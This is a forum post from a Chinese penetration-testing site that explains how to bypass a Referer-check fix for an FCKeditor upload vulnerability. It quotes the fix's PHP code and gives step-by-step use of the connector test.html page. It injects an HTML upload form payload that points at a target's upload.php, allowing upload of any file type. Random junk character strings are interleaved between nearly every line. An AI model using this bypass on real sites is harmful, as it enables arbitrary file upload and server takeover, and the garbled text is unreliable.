中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
6 J$ _3 Q8 l" b D A+ H: I
网上给出的修复方案是
6 S! a# D& r* f
修复方法,删除FCK编辑器用其他的编辑器
! S& W$ Y M6 U9 |5 H: m- m: q
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
" _. j# _& L" X9 I
在
! f9 Z5 \( {: `: p* E
require(‘config.php’);
& ^5 q. w/ |* R" u2 y8 `" P$ T
require(‘util.php’);
; R, U4 W" d$ C5 Z9 x/ V0 C1 d$ O
的下面添加以下代码—————————–
2 E+ T5 E. O4 Z$ B F0 j+ @9 Z
//防止外部提交
0 k+ F5 @8 U" E6 k0 o! G
function outsidepost()
1 U2 t8 N( W6 H$ M& M
{
: T2 k+ ~. }" _/ E* ?
$servername=$_SERVER['SERVER_NAME'];
K! f/ s( ?5 X' }
$sub_from=@$_SERVER['HTTP_REFERER'];
1 Y- ^/ P* Z$ O# j
$sub_len=strlen($servername);
% g) v- I1 m/ N' c! {
$checkfrom=substr($sub_from,7,$sub_len);
8 A: Q$ o/ V8 R
if($checkfrom!=$servername){
. b N, P( i! x! w
echo(“you don’t outsidepost!”);
/ r% y" v j- Y2 A/ f: k% h
exit;
# |/ _ S" b5 l
}
0 b& G3 T, o/ L0 O& L: d4 l) N9 |3 F
}
. H2 a7 t+ f! p4 X! \# M
outsidepost();
6 e: ]( p# T" K' R" m
防止外部提交,但是没有防止内部提交,
- j0 A+ z2 j% r! M6 Z# `) W/ Z; y4 Z
利用方法:
9 K: E) ]5 p& [
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
+ I( q) W3 e6 [) L( @
2,在Current Folder 框输入
3 I6 Z% [; _/ |7 I1 N: j
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
. {6 C& u5 K# Z" p6 N! a- E
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
7 h2 R0 [* @# l0 M7 ?3 ^5 e% u M
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2